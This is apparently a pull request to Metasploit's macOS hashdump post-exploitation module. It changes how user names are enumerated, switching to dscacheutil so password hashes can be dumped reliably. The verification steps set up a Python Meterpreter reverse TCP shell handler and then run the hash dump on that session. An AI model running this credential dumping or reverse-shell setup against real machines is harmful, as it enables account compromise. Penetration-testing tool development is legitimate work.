### PR TITLE
hash_dump now working properly up to Mac OS X High Sierra (10.13.6 in…

### DIFF
--- a/modules/post/osx/gather/hashdump.rb
+++ b/modules/post/osx/gather/hashdump.rb
@@ -8,7 +8,7 @@ require 'rexml/document'
 
 class MetasploitModule < Msf::Post
   # set of accounts to ignore while pilfering data
-  OSX_IGNORE_ACCOUNTS = ["Shared", ".localized"]
+  #OSX_IGNORE_ACCOUNTS = ["Shared", ".localized"]
 
   include Msf::Post::File
   include Msf::Post::OSX::Priv
@@ -203,7 +203,10 @@ class MetasploitModule < Msf::Post
 
   # @return [Array<String>] list of user names
   def users
-    @users ||= cmd_exec("/bin/ls /Users").each_line.collect.map(&:chomp) - OSX_IGNORE_ACCOUNTS
+    tmp = cmd_exec("dscacheutil -q user").split(/$/).map(&:strip) #- OSX_IGNORE_ACCOUNTS
+    res = Array.new()
+    tmp.each_with_index{ |val, index| res << val.split("name: ")[1] if val.include?("name: ") and tmp[index+1].include?("**")}
+    res
   end
 
   # @return [String] version string (e.g. 10.8.5)


### PR DESCRIPTION
…cluded)

This changes fix a simple issue which was preventing the module to work properly.
The initial idea was to add the support for newer Mac OS X releases. However, looks like the script works fine with the applied changes, also for the newer releases.

Initially, the script was retrieving the usernames using the **ls** utility. However, this behaviour may have led to several unexpected results. As an example, any file/directory stored under the /Users directory would have been considered as a regular user (which doesn't even make sense). 

With the applied changes, the usernames are retrieved directly from the DirectoryService, providing a more reliable way to obtain usernames and consequently allowing the script to retrieve the correct hashes.
 

## Verification

List the steps needed to make sure this thing works

Start 'msfconsole'

use exploit/multi/handler

set payload python/meterpreter/reverse_tcp

set lhost dummy_ip

set lport dummy_port

exploit -j

Wait for a valid Python meterpreter reverse TCP shell (assuming its spawned as 'session 1')

use post/osx/gather/hashdump

set session 1

run